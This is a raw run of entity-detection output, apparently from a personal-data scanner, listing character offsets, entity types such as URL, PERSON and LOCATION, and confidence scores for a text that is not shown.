end: 27931, score: 0.5, type: URL, start: 27955, end: 27960, score: 0.5, type: URL, start: 28003, end: 28008, score: 0.5, type: URL, start: 28052, end: 28056, score: 0.5, type: URL, start: 28173, end: 28186, score: 0.5, type: URL, start: 28210, end: 28215, score: 0.5, type: URL, start: 28264, end: 28269, score: 0.5, type: URL, start: 28356, end: 28367, score: 0.5, type: URL, start: 28392, end: 28397, score: 0.5, type: URL, start: 28476, end: 28481, score: 0.5, type: URL, start: 28511, end: 28515, score: 0.5, type: URL, start: 28544, end: 28549, score: 0.5, type: URL, start: 28619, end: 28624, score: 0.5, type: URL, start: 28658, end: 28662, score: 0.5, type: URL, start: 28762, end: 28773, score: 0.5, type: URL, start: 28798, end: 28803, score: 0.5, type: URL, start: 28891, end: 28896, score: 0.5, type: URL, start: 28974, end: 28982, score: 0.5, type: URL, start: 29007, end: 29012, score: 0.5, type: URL, start: 29178, end: 29193, score: 0.5, type: URL, start: 29218, end: 29223, score: 0.5, type: URL, start: 29301, end: 29306, score: 0.5, type: URL, start: 29384, end: 29395, score: 0.5, type: URL, start: 29420, end: 29425, score: 0.5, type: URL, start: 29500, end: 29505, score: 0.5, type: URL, start: 29583, end: 29594, score: 0.5, type: URL, start: 29599, end: 29606, score: 0.5, type: URL, start: 29615, end: 29629, score: 0.5, type: URL, start: 29654, end: 29659, score: 0.5, type: URL, start: 29780, end: 29785, score: 0.5, type: URL, start: 29984, end: 29989, score: 0.5, type: URL, start: 30253, end: 30258, score: 0.5, type: URL, start: 30294, end: 30298, score: 0.5, type: URL, start: 30327, end: 30332, score: 0.5, type: URL, start: 30395, end: 30400, score: 0.5, type: URL, start: 30434, end: 30438, score: 0.5, type: URL, start: 30481, end: 30489, score: 0.5, type: URL, start: 30660, end: 30668, score: 0.5, type: URL, start: 30693, end: 30701, score: 0.5, type: URL, start: 30758, end: 30765, score: 0.5, type: URL, start: 31003, end: 31007, score: 0.5, type: URL, start: 31408, end: 31419, score: 0.5, type: URL, start: 31436, end: 31447, score: 0.5, type: URL, start: 31475, end: 31480, score: 0.5, type: URL, start: 31564, end: 31569, score: 0.5, type: URL, start: 33307, end: 33318, score: 0.5, type: URL, start: 33322, end: 33333, score: 0.5, type: URL, start: 33336, end: 33347, score: 0.5, type: URL, start: 33507, end: 33521, score: 0.5, type: PERSON, start: 196, end: 208, score: 0.85, type: PERSON, start: 9026, end: 9042, score: 0.85, type: DATE_TIME, start: 13156, end: 13160, score: 0.85, type: PERSON, start: 17255, end: 17271, score: 0.85, type: LOCATION, start: 17308, end: 17320, score: 0.85, type: PERSON, start: 17980, end: 18015, score: 0.85, type: PERSON, start: 19410, end: 19426, score: 0.85, type: PERSON, start: 21452, end: 21461, score: 0.85, type: PERSON, start: 21568, end: 21590, score: 0.85, type: PERSON, start: 22691, end: 22707, score: 0.85, type: PERSON, start: 23569, end: 23600, score: 0.85, type: PERSON, start: 23699, end: 23706, score: 0.85, type: PERSON, start: 23791, end: 23798, score: 0.85, type: PERSON, start: 23917, end: 23945, score: 0.85, type: PERSON, start: 25160, end: 25177, score: 0.85, type: LOCATION, start: 30452, end: 30461, score: 0.85, type: LOCATION, start: 35851, end: 35857, score: 0.85, type: DATE_TIME, start: 35907, end: 35913, score: 0.85, type: LOCATION, start: 39538, end: 39542, score: 0.85, type: LOCATION, start: 40015, end: 40024, score: 0.85, type: PERSON, start: 41500, end: 41517, score: 0.85, type: LOCATION, start: 46777, end: 46786, score: 0.85, type: NRP, start: 48562, end: 48573, score: 0.85, type: PERSON, start: 48980, end: 49011, score: 0.85, type: PERSON, start: 49110, end: 49117, score: 0.85, type: PERSON, start: 49198, end: 49205, score: 0.85, type: PERSON, start: 49324, end: 49352, score: 0.85, type: PERSON, start: 50229, end: 50259, score: 0.85, type: PERSON, start: 50545, end: 50556, score: 0.85, type: LOCATION, start: 55378, end: 55384, score: 0.85, type: DATE_TIME, start: 55434, end: 55440, score: 0.85, type: LOCATION, start: 58626, end: 58637, score: 0.85, type: PERSON, start: 58683, end: 58695, score: 0.85, type: PERSON, start: 59497, end: 59504, score: 0.85, type: PERSON, start: 59663, end: 59678, score: 0.85, type: PERSON, start: 60265, end: 60275, score: 0.85, type: LOCATION, start: 60438, end: 60447, score: 0.85, type: PERSON, start: 61175, end: 61187, score: 0.85, type: LOCATION, start: 61291, end: 61302, score: 0.85, type: LOCATION, start: 61736, end: 61747, score: 0.85, type: LOCATION, start: 61913, end: 61924, score: 0.85, type: LOCATION, start: 62065, end: 62076, score: 0.85, type: LOCATION, start: 63478, end: 63489, score: 0.85, type: LOCATION, start: 64322, end: 64333, score: 0.85, type: PERSON, start: 64901, end: 64928, score: 0.85, type: URL, start: 64906, end: 64912, score: 0.85, type: PERSON, start: 65110, end: 65119, score: 0.85, type: PERSON, start: 65302, end: 65324, score: 0.85, type: LOCATION, start: 65520, end: 65531, score: 0.85, type: NRP, start: 65617, end: 65640, score: 0.85, type: PERSON, start: 66315, end: 66323, score: 0.85, type: PERSON, start: 66432, end: 66454, score: 0.85, type: PERSON, start: 67547, end: 67564, score: 0.85, type: PERSON, start: 67900, end: 67916, score: 0.85, type: LOCATION, start: 67918, end: 67931, score: 0.85, type: PERSON, start: 68019, end: 68035, score: 0.85, type: LOCATION, start: 68037, end: 68050, score: 0.85, type: PERSON, start: 68397, end: 68424, score: 0.85, type: PERSON, start: 68549, end: 68558, score: 0.85, type: PERSON, start: 69005, end: 69021, score: 0.85, type: LOCATION, start: 69464, end: 69475, score: 0.85, type: PERSON, start: 70443, end: 70465, score: 0.85, type: URL, start: 150, end: 193, score: 0.6, type: URL, start: 315, end: 371, score: 0.6, type: URL, start: 375, end: 415, score: 0.6, type: URL, start: 437, end: 501, score: 0.6, type: URL, start: 505, end: 551, score: 0.6, type: URL, start: 14878, end: 14928, score: 0.6, type: URL, start: 20478, end: 20521, score: 0.6, type: URL, start: 62199, end: 62252, score: 0.6, type: URL, start: 70008, end: 70067, score: 0.6, type: URL, start: 1001, end: 1009, score: 0.5, type: URL, start: 1410, end: 1418, score: 0.5, type: URL, start: 1831, end: 1841, score: 0.5, type: URL, start: 2882, end: 2890, score: 0.5, type: URL, start: 2970, end: 2980, score: 0.5, type: URL, start: 3057, end: 3067, score: 0.5, type: URL, start: 3154, end: 3164, score: 0.5, type: URL, start: 3239, end: 3249, score: 0.5, type: URL, start: 3433, end: 3441, score: 0.5, type: URL, start: 3472, end: 3485, score: 0.5, type: URL, start: 3543, end: 3551, score: 0.5, type: URL, start: 3562, end: 3570, score: 0.5, type: URL, start: 3696, end: 3704, score: 0.5, type: URL, start: 3717, end: 3725, score: 0.5, type: URL, start: 3746, end: 3756, score: 0.5, type: URL, start: 4123, end: 4134, score: 0.5, type: URL, start: 4292, end: 4302, score: 0.5, type: URL, start: 4471, end: 4481, score: 0.5, type: URL, start: 4568, end: 4576, score: 0.5, type: URL, start: 4884, end: 4894, score: 0.5, type: URL, start: 4905, end: 4913, score: 0.5, type: URL, start: 5089, end: 5099, score: 0.5, type: URL, start: 5107, end: 5115, score: 0.5, type: URL, start: 5401, end: 5409, score: 0.5, type: URL, start: 5552, end: 5562, score: 0.5, type: URL, start: 5607, end: 5617, score: 0.5, type: URL, start: 5654, end: 5662, score: 0.5, type: URL, start: 5706, end: 5716, score: 0.5, type: URL, start: 5921, end: 5929, score: 0.5, type: URL, start: 5954, end: 5967, score: 0.5, type: URL, start: 6042, end: 6055, score: 0.5, type: URL, start: 6123, end: 6131, score: 0.5, type: URL, start: 6738, end: 6746, score: 0.5, type: URL, start: 6863, end: 6876, score: 0.5, type: URL, start: 6915, end: 6928, score: 0.5, type: URL, start: 7019, end: 7027, score: 0.5, type: URL, start: 7284, end: 7294, score: 0.5, type: URL, start: 7328, end: 7338, score: 0.5, type: URL, start: 7464, end: 7477, score: 0.5, type: URL, start: 7525, end: 7535, score: 0.5, type: URL, start: 7634, end: 7644, score: 0.5, type: URL, start: 7705, end: 7715, score: 0.5, type: URL, start: 7735, end: 7746, score: 0.5, type: URL, start: 7765, end: 7778, score: 0.5, type: URL, start: 7804, end: 7814, score: 0.5, type: URL, start: 7913, end: 7921, score: 0.5, type: URL, start: 7927, end: 7935, score: 0.5, type: URL, start: 8042, end: 8050, score: 0.5, type: URL, start: 8124, end: 8137, score: 0.5, type: URL, start: 8167, end: 8180, score: 0.5, type: URL, start: 8373, end: 8381, score: 0.5, type: URL, start: 8388, end: 8396, score: 0.5, type: URL, start: 8792, end: 8800, score: 0.5, type: URL, start: 9017, end: 9039, score: 0.5, type: URL, start: 9328, end: 9336, score: 0.5, type: URL, start: 9370, end: 9383, score: 0.5, type: URL, start: 10287, end: 10295, score: 0.5, type: URL, start: 11035, end: 11043, score: 0.5, type: URL, start: 11372, end: 11383, score: 0.5, type: URL, start: 11808, end: 11818, score: 0.5, type: URL, start: 12029, end: 12037, score: 0.5, type: URL, start: 12415, end: 12423, score: 0.5, type: URL, start: 12586, end: 12596, score: 0.5, type: URL, start: 12741, end: 12749, score: 0.5, type: URL, start: 12789, end: 12797, score: 0.5, type: URL, start: 12981, end: 12989, score: 0.5, type: URL, start: 13713, end: 13726, score: 0.5, type: URL, start: 13746, end: 13754, score: 0.5, type: URL, start: 13775, end: 13783, score: 0.5, type: URL, start: 14085, end: 14098, score: 0.5, type: URL, start: 14153, end: 14171, score: 0.5, type: URL, start: 14189, end: 14207, score: 0.5, type: URL, start: 14278, end: 14291, score: 0.5, type: URL, start: 14443, end: 14451, score: 0.5, type: URL, start: 14699, end: 14709, score: 0.5, type: URL, start: 15385, end: 15393, score: 0.5, type: URL, start: 15395, end: 15403, score: 0.5, type: URL, start: 15410, end: 15423, score: 0.5, type: URL, start: 15445, end: 15455, score: 0.5, type: URL, start: 15462, end: 15467, score: 0.5, type: URL, start: 15478, end: 15483, score: 0.5, type: URL, start: 15507, end: 15517, score: 0.5, type: URL, start: 15527, end: 15535, score: 0.5, type: URL, start: 15558, end: 15568, score: 0.5, type: URL, start: 15578, end: 15591, score: 0.5, type: URL, start: 15606, end: 15611, score: 0.5, type: URL, start: 15634, end: 15639, score: 0.5, type: URL, start: 15698, end: 15706, score: 0.5, type: URL, start: 15731, end: 15736, score: 0.5, type: URL, start: 15747, end: 15757, score: 0.5, type: URL, start: 15764, end: 15769, score: 0.5, type: URL, start: 15780, end: 15786, score: 0.5, type: URL, start: 15814, end: 15824, score: 0.5, type: URL, start: 15834, end: 15842, score: 0.5, type: URL, start: 15869, end: 15879, score: 0.5, type: URL, start: 15889, end: 15902, score: 0.5, type: URL, start: 15917, end: 15922, score: 0.5, type: URL, start: 15945, end: 15950, score: 0.5, type: URL, start: 16088, end: 16096, score: 0.5, type: URL, start: 16173, end: 16181, score: 0.5, type: URL, start: 16240, end: 16246, score: 0.5, type: URL, start: 16309, end: 16317, score: 0.5, type: URL, start: 16419, end: 16427, score: 0.5, type: URL, start: 16689, end: 16694, score: 0.5, type: URL, start: 16754, end: 16767, score: 0.5, type: URL, start: 16825, end: 16835, score: 0.5, type: URL, start: 16842, end: 16847, score: 0.5, type: URL, start: 16880, end: 16885, score: 0.5, type: URL, start: 16907, end: 16912, score: 0.5, type: URL, start: 16992, end: 17005, score: 0.5, type: URL, start: 17036, end: 17041, score: 0.5, type: URL, start: 17182, end: 17190, score: 0.5, type: URL, start: 17276, end: 17284, score: 0.5, type: URL, start: 17308, end: 17323, score: 0.5, type: URL, start: 17383, end: 17398, score: 0.5, type: URL, start: 17470, end: 17483, score: 0.5, type: URL, start: 17517, end: 17525, score: 0.5, type: URL, start: 17545, end: 17555, score: 0.5, type: URL, start: 17565, end: 17573, score: 0.5, type: URL, start: 17590, end: 17605, score: 0.5, type: URL, start: 17666, end: 17675, score: 0.5, type: URL, start: 17693, end: 17702, score: 0.5, type: URL, start: 17835, end: 17844, score: 0.5, type: URL, start: 17919, end: 17925, score: 0.5, type: URL, start: 17937, end: 17943, score: 0.5, type: URL, start: 17980, end: 17986, score: 0.5, type: URL, start: 18043, end: 18049, score: 0.5, type: URL, start: 18218, end: 18224, score: 0.5, type: URL, start: 18277, end: 18283, score: 0.5, type: URL, start: 19141, end: 19147, score: 0.5, type: URL, start: 19477, end: 19481, score: 0.5, type: URL, start: 19783, end: 19788, score: 0.5, type: URL, start: 19817, end: 19823, score: 0.5, type: URL, start: 19860, end: 19869, score: 0.5, type: URL, start: 19883, end: 19887, score: 0.5, type: URL, start: 20241, end: 20249, score: 0.5, type: URL, start: 20294, end: 20302, score: 0.5, type: URL, start: 20550, end: 20560, score: 0.5, type: URL, start: 20790, end: 20812, score: 0.5, type: URL, start: 20907, end: 20917, score: 0.5, type: URL, start: 21352, end: 21360, score: 0.5, type: URL, start: 21388, end: 21398, score: 0.5, type: URL, start: 21432, end: 21438, score: 0.5, type: URL, start: 21452, end: 21458, score: 0.5, type: URL, start: 21518, end: 21524, score: 0.5, type: URL, start: 21568, end: 21574, score: 0.5, type: URL, start: 21622, end: 21628, score: 0.5, type: URL, start: 22422, end: 22428, score: 0.5, type: URL, start: 22758, end: 22762, score: 0.5, type: URL, start: 23068, end: 23073, score: 0.5, type: URL, start: 23102, end: 23108, score: 0.5, type: URL, start: 23145, end: 23154, score: 0.5, type: URL, start: 23168, end: 23172, score: 0.5, type: URL, start: 23579, end: 23589, score: 0.5, type: URL, start: 23613, end: 23623, score: 0.5, type: URL, start: 24203, end: 24213, score: 0.5, type: URL, start: 24279, end: 24287, score: 0.5, type: URL, start: 24314, end: 24324, score: 0.5, type: URL, start: 24405, end: 24415, score: 0.5, type: URL, start: 24503, end: 24507, score: 0.5, type: URL, start: 24533, end: 24540, score: 0.5, type: URL, start: 24597, end: 24602, score: 0.5, type: URL, start: 24694, end: 24699, score: 0.5, type: URL, start: 24721, end: 24728, score: 0.5, type: URL, start: 24781, end: 24786, score: 0.5, type: URL, start: 24874, end: 24879, score: 0.5, type: URL, start: 24894, end: 24898, score: 0.5, type: URL, start: 25254, end: 25265, score: 0.5, type: URL, start: 25452, end: 25456, score: 0.5, type: URL, start: 25471, end: 25482, score: 0.5, type: URL, start: 25706, end: 25710, score: 0.5, type: URL, start: 26291, end: 26296, score: 0.5, type: URL, start: 26583, end: 26589, score: 0.5, type: URL, start: 27534, end: 27544, score: 0.5, type: URL, start: 27675, end: 27680, score: 0.5, type: URL, start: 27690, end: 27700, score: 0.5, type: URL, start: 27859, end: 27865, score: 0.5, type: URL, start: 27901, end: 27907, score: 0.5, type: URL, start: 28545, end: 28551, score: 0.5, type: URL, start: 28722, end: 28728, score: 0.5, type: URL, start: 29967, end: 29972, score: 0.5, type: URL, start: 30286, end: 30291, score: 0.5, type: URL, start: 30318, end: 30324, score: 0.5, type: URL, start: 30789, end: 30794, score: 0.5, type: URL, start: 30869, end: 30874, score: 0.5, type: URL, start: 31368, end: 31377, score: 0.5, type: URL, start: 31560, end: 31571, score: 0.5, type: URL, start: 31659, end: 31663, score: 0.5, type: URL, start: 31734, end: 31754, score: 0.5, type: URL, start: 32365, end: 32373, score: 0.5, type: URL, start: 32431, end: 32440, score: 0.5, type: URL, start: 32585, end: 32593, score: 0.5, type: URL, start: 32674, end: 32683, score: 0.5, type: URL, start: 35671, end: 35678, score: 0.5, type: URL, start: 36248, end: 36256, score: 0.5, type: URL, start: 36343, end: 36352, score: 0.5, type: URL, start: 36419, end: 36434, score: 0.5, type: URL, start: 36490, end: 36495, score: 0.5, type: URL, start: 38390, end: 38399, score: 0.5, type: URL, start: 38544, end: 38553, score: 0.5, type: URL, start: 38905, end: 38915, score: 0.5, type: URL, start: 39197, end: 39203, score: 0.5, type: URL, start: 39408, end: 39418, score: 0.5, type: URL, start: 39650, end: 39656, score: 0.5, type: URL, start: 39704, end: 39709, score: 0.5, type: URL, start: 40015, end: 40021, score: 0.5, type: URL, start: 40086, end: 40092, score: 0.5, type: URL, start: 40151, end: 40157, score: 0.5, type: URL, start: 40543, end: 40553, score: 0.5, type: URL, start: 40619, end: 40627, score: 0.5, type: URL, start: 40654, end: 40664, score: 0.5, type: URL, start: 40745, end: 40755, score: 0.5, type: URL, start: 40843, end: 40847, score: 0.5, type: URL, start: 40873, end: 40880, score: 0.5, type: URL, start: 40937, end: 40942, score: 0.5, type: URL, start: 41034, end: 41039, score: 0.5, type: URL, start: 41061, end: 41068, score: 0.5, type: URL, start: 41121, end: 41126, score: 0.5, type: URL, start: 41214, end: 41219, score: 0.5, type: URL, start: 41234, end: 41238, score: 0.5, type: URL, start: 41594, end: 41605, score: 0.5, type: URL, start: 41792, end: 41796, score: 0.5, type: URL, start: 41811, end: 41822, score: 0.5, type: URL, start: 42046, end: 42050, score: 0.5, type: URL, start: 42630, end: 42635, score: 0.5, type: URL, start: 42918, end: 42924, score: 0.5, type: URL, start: 43867, end: 43877, score: 0.5, type: URL, start: 44008, end: 44013, score: 0.5, type: URL, start: 44023, end: 44033, score: 0.5, type: URL, start: 44190, end: 44196, score: 0.5, type: URL, start: 44232, end: 44238, score: 0.5, type: URL, start: 44874, end: 44880, score: 0.5, type: URL, start: 45051, end: 45057, score: 0.5, type: URL, start: 46296, end: 46301, score: 0.5, type: URL, start: 46613, end: 46618, score: 0.5, type: URL, start: 46645, end: 46651, score: 0.5, type: URL, start: 47110, end: 47115, score: 0.5, type: URL, start: 47190, end: 47195, score: 0.5, type: URL, start: 47658, end: 47668, score: 0.5, type: URL, start: 47745, end: 47751, score: 0.5, type: URL, start: 47787, end: 47793, score: 0.5, type: URL, start: 47995, end: 48000, score: 0.5, type: URL, start: 48053, end: 48063, score: 0.5, type: URL, start: 48122, end: 48135, score: 0.5, type: URL, start: 48260, end: 48264, score: 0.5, type: URL, start: 48290, end: 48297, score: 0.5, type: URL, start: 48372, end: 48379, score: 0.5, type: URL, start: 48441, end: 48445, score: 0.5, type: URL, start: 48620, end: 48624, score: 0.5, type: URL, start: 48990, end: 49000, score: 0.5, type: URL, start: 49024, end: 49034, score: 0.5, type: URL, start: 49491, end: 49504, score: 0.5, type: URL, start: 49899, end: 49909, score: 0.5, type: URL, start: 49991, end: 49995, score: 0.5, type: URL, start: 50074, end: 50084, score: 0.5, type: URL, start: 50096, end: 50101, score: 0.5, type: URL, start: 50264, end: 50274, score: 0.5, type: URL, start: 50299, end: 50304, score: 0.5, type: URL, start: 50413, end: 50423, score: 0.5, type: URL, start: 50924, end: 50933, score: 0.5, type: URL, start: 51116, end: 51127, score: 0.5, type: URL, start: 51215, end: 51219, score: 0.5, type: URL, start: 51290, end: 51310, score: 0.5, type: URL, start: 51915, end: 51923, score: 0.5, type: URL, start: 51981, end: 51990, score: 0.5, type: URL, start: 52135, end: 52143, score: 0.5, type: URL, start: 52222, end: 52231, score: 0.5, type: URL, start: 55199, end: 55206, score: 0.5, type: URL, start: 55775, end: 55783, score: 0.5, type: URL, start: 55867, end: 55876, score: 0.5, type: URL, start: 55908, end: 55923, score: 0.5, type: URL, start: 55959, end: 55966, score: 0.5, type: URL, start: 56031, end: 56036, score: 0.5, type: URL, start: 57921, end: 57930, score: 0.5, type: URL, start: 58075, end: 58084, score: 0.5, type: URL, start: 58626, end: 58632, score: 0.5, type: URL, start: 58671, end: 58682, score: 0.5, type: URL, start: 58710, end: 58716, score: 0.5, type: URL, start: 58808, end: 58814, score: 0.5, type: URL, start: 58861, end: 58869, score: 0.5, type: URL, start: 58887, end: 58898, score: 0.5, type: URL, start: 58900, end: 58906, score: 0.5, type: URL, start: 58956, end: 58962, score: 0.5, type: URL, start: 58989, end: 58995, score: 0.5, type: URL, start: 59012, end: 59018, score: 0.5, type: URL, start: 59070, end: 59083, score: 0.5, type: URL, start: 59198, end: 59208, score: 0.5, type: URL, start: 59217, end: 59223, score: 0.5, type: URL, start: 59280, end: 59290, score: 0.5, type: URL, start: 59447, end: 59455, score: 0.5, type: URL, start: 59630, end: 59641, score: 0.5, type: URL, start: 59681, end: 59692, score: 0.5, type: URL, start: 60278, end: 60289, score: 0.5, type: URL, start: 60438, end: 60444, score: 0.5, type: URL, start: 60619, end: 60625, score: 0.5, type: URL, start: 60683, end: 60689, score: 0.5, type: URL, start: 61291, end: 61297, score: 0.5, type: URL, start: 61316, end: 61322, score: 0.5, type: URL, start: 61375, end: 61383, score: 0.5, type: URL, start: 61519, end: 61527, score: 0.5, type: URL, start: 61679, end: 61687, score: 0.5, type: URL, start: 61736, end: 61742, score: 0.5, type: URL, start: 61764, end: 61772, score: 0.5, type: URL, start: 61913, end: 61919, score: 0.5, type: URL, start: 62065, end: 62071, score: 0.5, type: URL, start: 62334, end: 62346, score: 0.5, type: URL, start: 62782, end: 62789, score: 0.5, type: URL, start: 62844, end: 62851, score: 0.5, type: URL, start: 63478, end: 63484, score: 0.5, type: URL, start: 63504, end: 63518, score: 0.5, type: URL, start: 63584, end: 63597, score: 0.5, type: URL, start: 63831, end: 63836, score: 0.5, type: URL, start: 63870, end: 63880, score: 0.5, type: URL, start: 63975, end: 63981, score: 0.5, type: URL, start: 64035, end: 64045, score: 0.5, type: URL, start: 64114, end: 64120, score: 0.5, type: URL, start: 64322, end: 64328, score: 0.5, type: URL, start: 64647, end: 64653, score: 0.5, type: URL, start: 64820, end: 64826, score: 0.5, type: URL, start: 64984, end: 64990, score: 0.5, type: URL, start: 65110, end: 65116, score: 0.5, type: URL, start: 65229, end: 65235, score: 0.5, type: URL, start: 65302, end: 65308, score: 0.5, type: URL, start: 65520, end: 65526, score: 0.5, type: URL, start: 65546, end: 65567, score: 0.5, type: URL, start: 65617, end: 65637, score: 0.5, type: URL, start: 65921, end: 65950, score: 0.5, type: URL, start: 65998, end: 66006, score: 0.5, type: URL, start: 66157, end: 66165, score: 0.5, type: URL, start: 66230, end: 66240, score: 0.5, type: URL, start: 66409, end: 66419, score: 0.5, type: URL, start: 66432, end: 66438, score: 0.5, type: URL, start: 66703, end: 66711, score: 0.5, type: URL, start: 66868, end: 66878, score: 0.5, type: URL, start: 66911, end: 66921, score: 0.5, type: URL, start: 67000, end: 67008, score: 0.5, type: URL, start: 67064, end: 67077, score: 0.5, type: URL, start: 67106, end: 67119, score: 0.5, type: URL, start: 67170, end: 67183, score: 0.5, type: URL, start: 67221, end: 67229, score: 0.5, type: URL, start: 67268, end: 67281, score: 0.5, type: URL, start: 67338, end: 67351, score: 0.5, type: URL, start: 67399, end: 67412, score: 0.5, type: URL, start: 67918, end: 67933, score: 0.5, type: URL, start: 67959, end: 67974, score: 0.5, type: URL, start: 68037, end: 68052, score: 0.5, type: URL, start: 68122, end: 68130, score: 0.5, type: URL, start: 68157, end: 68163, score: 0.5, type: URL, start: 68191, end: 68201, score: 0.5, type: URL, start: 68211, end: 68219, score: 0.5, type: URL, start: 68307, end: 68313, score: 0.5, type: URL, start: 68364, end: 68370, score: 0.5, type: URL, start: 68402, end: 68408, score: 0.5, type: URL, start: 68468, end: 68474, score: 0.5, type: URL, start: 68549, end: 68555, score: 0.5, type: URL, start: 68658, end: 68664, score: 0.5, type: URL, start: 68726, end: 68732, score: 0.5, type: URL, start: 68788, end: 68798, score: 0.5, type: URL, start: 68801, end: 68806, score: 0.5, type: URL, start: 68817, end: 68823, score: 0.5, type: URL, start: 68887, end: 68892, score: 0.5, type: URL, start: 68981, end: 68985, score: 0.5, type: URL, start: 69373, end: 69386, score: 0.5, type: URL, start: 69423, end: 69433, score: 0.5, type: URL, start: 69464, end: 69475, score: 0.5, type: URL, start: 69610, end: 69620, score: 0.5, type: URL, start: 69630, end: 69641, score: 0.5, type: URL, start: 69769, end: 69776, score: 0.5, type: URL, start: 69882, end: 69893, score: 0.5, type: URL, start: 69982, end: 69993, score: 0.5, type: URL, start: 70182, end: 70195, score: 0.5, type: URL, start: 70248, end: 70261, score: 0.5, type: URL, start: 70266, end: 70277, score: 0.5, type: URL, start: 70351, end: 70364, score: 0.5, type: URL, start: 70396, end: 70409, score: 0.5, type: URL, start: 70422, end: 70433, score: 0.5, type: URL, start: 70443, end: 70449, score: 0.5, type: URL, start: 70545, end: 70556, score: 0.5, type: URL, start: 70574, end: 70580, score: 0.5, type: URL, start: 70677, end: 70683, score: 0.5, type: URL, start: 70757, end: 70768, score: 0.5, type: URL, start: 70873, end: 70883, score: 0.5, type: URL, start: 70960, end: 70966, score: 0.5, type: URL, start: 71057, end: 71065, score: 0.5, type: URL, start: 71172, end: 71180, score: 0.5, type: URL, start: 71214, end: 71218, score: 0.5, type: URL, start: 71289, end: 71297, score: 0.5, type: URL, start: 71325, end: 71338, score: 0.5, type: URL, start: 71377, end: 71385, score: 0.5, type: URL, start: 71415, end: 71428, score: 0.5, type: URL, start: 71466, end: 71474, score: 0.5, type: URL, start: 71507, end: 71520, score: 0.5, type: URL, start: 71579, end: 71592, score: 0.5, type: URL, start: 71712, end: 71720, score: 0.5, type: URL, start: 71971, end: 71984, score: 0.5, type: URL, start: 72031, end: 72044, score: 0.5, type: URL, start: 72165, end: 72178, score: 0.5, type: URL, start: 72206, end: 72219, score: 0.5, type: URL, start: 72291, end: 72299, score: 0.5, type: URL, start: 72329, end: 72337, score: 0.5, type: URL, start: 72434, end: 72440, score: 0.5, type: EMAIL_ADDRESS, start: 104, end: 119, score: 1.0, type: PERSON, start: 42, end: 46, score: 0.85, type: DATE_TIME, start: 64, end: 73, score: 0.85, type: PERSON, start: 74, end: 88, score: 0.85, type: LOCATION, start: 145, end: 156, score: 0.85, type: PERSON, start: 733, end: 744, score: 0.85, type: PERSON, start: 1095, end: 1106, score: 0.85, type: LOCATION, start: 1272, end: 1283, score: 0.85, type: PERSON, start: 1387, end: 1398, score: 0.85, type: LOCATION, start: 1476, end: 1487, score: 0.85, type: DATE_TIME, start: 2633, end: 2642, score: 0.85, type: PERSON, start: 3851, end: 3855, score: 0.85, type: PERSON, start: 4133, end: 4137, score: 0.85, type: PERSON, start: 4216, end: 4227, score: 0.85, type: LOCATION, start: 7490, end: 7497, score: 0.85, type: LOCATION, start: 8310, end: 8317, score: 0.85, type: DATE_TIME, start: 8689, end: 8701, score: 0.85, type: PERSON, start: 8813, end: 8840, score: 0.85, type: DATE_TIME, start: 9842, end: 9846, score: 0.85, type: LOCATION, start: 9888, end: 9895, score: 0.85, type: NRP, start: 11111, end: 11115, score: 0.85, type: NRP, start: 11411, end: 11415, score: 0.85, type: PERSON, start: 11960, end: 11971, score: 0.85, type: DATE_TIME, start: 15593, end: 15597, score: 0.85, type: URL, start: 760, end: 788, score: 0.6, type: URL, start: 6998, end: 7062, score: 0.6, type: URL, start: 8349, end: 8403, score: 0.6, type: URL, start: 14416, end: 14459, score: 0.6, type: URL, start: 14729, end: 14797, score: 0.6, type: URL, start: 15249, end: 15292, score: 0.6, type: URL, start: 15301, end: 15344, score: 0.6, type: URL, start: 110, end: 119, score: 0.5, type: URL, start: 1238, end: 1252, score: 0.5, type: URL, start: 1483, end: 1491, score: 0.5, type: URL, start: 1577, end: 1587, score: 0.5, type: URL, start: 1612, end: 1622, score: 0.5, type: URL, start: 1654, end: 1664, score: 0.5, type: URL, start: 1699, end: 1709, score: 0.5, type: URL, start: 1915, end: 1927, score: 0.5, type: URL, start: 1943, end: 1955, score: 0.5, type: URL, start: 2064, end: 2076, score: 0.5, type: URL, start: 2092, end: 2104, score: 0.5, type: URL, start: 2131, end: 2143, score: 0.5, type: URL, start: 2162, end: 2174, score: 0.5, type: URL, start: 2231, end: 2241, score: 0.5, type: URL, start: 2350, end: 2362, score: 0.5, type: URL, start: 2515, end: 2527, score: 0.5, type: URL, start: 2997, end: 3007, score: 0.5, type: URL, start: 3084, end: 3094, score: 0.5, type: URL, start: 3211, end: 3220, score: 0.5, type: URL, start: 3328, end: 3338, score: 0.5, type: URL, start: 3689, end: 3701, score: 0.5, type: URL, start: 4029, end: 4037, score: 0.5, type: URL, start: 4061, end: 4069, score: 0.5, type: URL, start: 4102, end: 4109, score: 0.5, type: URL, start: 4263, end: 4280, score: 0.5, type: URL, start: 4294, end: 4301, score: 0.5, type: URL, start: 4327, end: 4334, score: 0.5, type: URL, start: 4411, end: 4421, score: 0.5, type: URL, start: 4453, end: 4465, score: 0.5, type: URL, start: 4597, end: 4614, score: 0.5, type: URL, start: 4620, end: 4632, score: 0.5, type: URL, start: 4708, end: 4715, score: 0.5, type: URL, start: 4826, end: 4832, score: 0.5, type: URL, start: 4841, end: 4850, score: 0.5, type: URL, start: 4869, end: 4883, score: 0.5, type: URL, start: 4889, end: 4901, score: 0.5, type: URL, start: 4946, end: 4955, score: 0.5, type: URL, start: 4962, end: 4971, score: 0.5, type: URL, start: 4989, end: 4996, score: 0.5, type: URL, start: 5018, end: 5025, score: 0.5, type: URL, start: 5165, end: 5183, score: 0.5, type: URL, start: 5289, end: 5296, score: 0.5, type: URL, start: 5300, end: 5309, score: 0.5, type: URL, start: 5395, end: 5402, score: 0.5, type: URL, start: 5406, end: 5415, score: 0.5, type: URL, start: 5458, end: 5465, score: 0.5, type: URL, start: 5469, end: 5478, score: 0.5, type: URL, start: 5852, end: 5866, score: 0.5, type: URL, start: 6199, end: 6205, score: 0.5, type: URL, start: 6232, end: 6249, score: 0.5, type: URL, start: 6351, end: 6361, score: 0.5, type: URL, start: 6419, end: 6429, score: 0.5, type: URL, start: 6479, end: 6488, score: 0.5, type: URL, start: 6514, end: 6533, score: 0.5, type: URL, start: 6600, end: 6609, score: 0.5, type: URL, start: 6638, end: 6657, score: 0.5, type: URL, start: 6727, end: 6736, score: 0.5, type: URL, start: 6755, end: 6774, score: 0.5, type: URL, start: 6858, end: 6875, score: 0.5, type: URL, start: 7104, end: 7116, score: 0.5, type: URL, start: 7143, end: 7151, score: 0.5, type: URL, start: 7576, end: 7581, score: 0.5, type: URL, start: 7830, end: 7835, score: 0.5, type: URL, start: 7909, end: 7918, score: 0.5, type: URL, start: 8445, end: 8457, score: 0.5, type: URL, start: 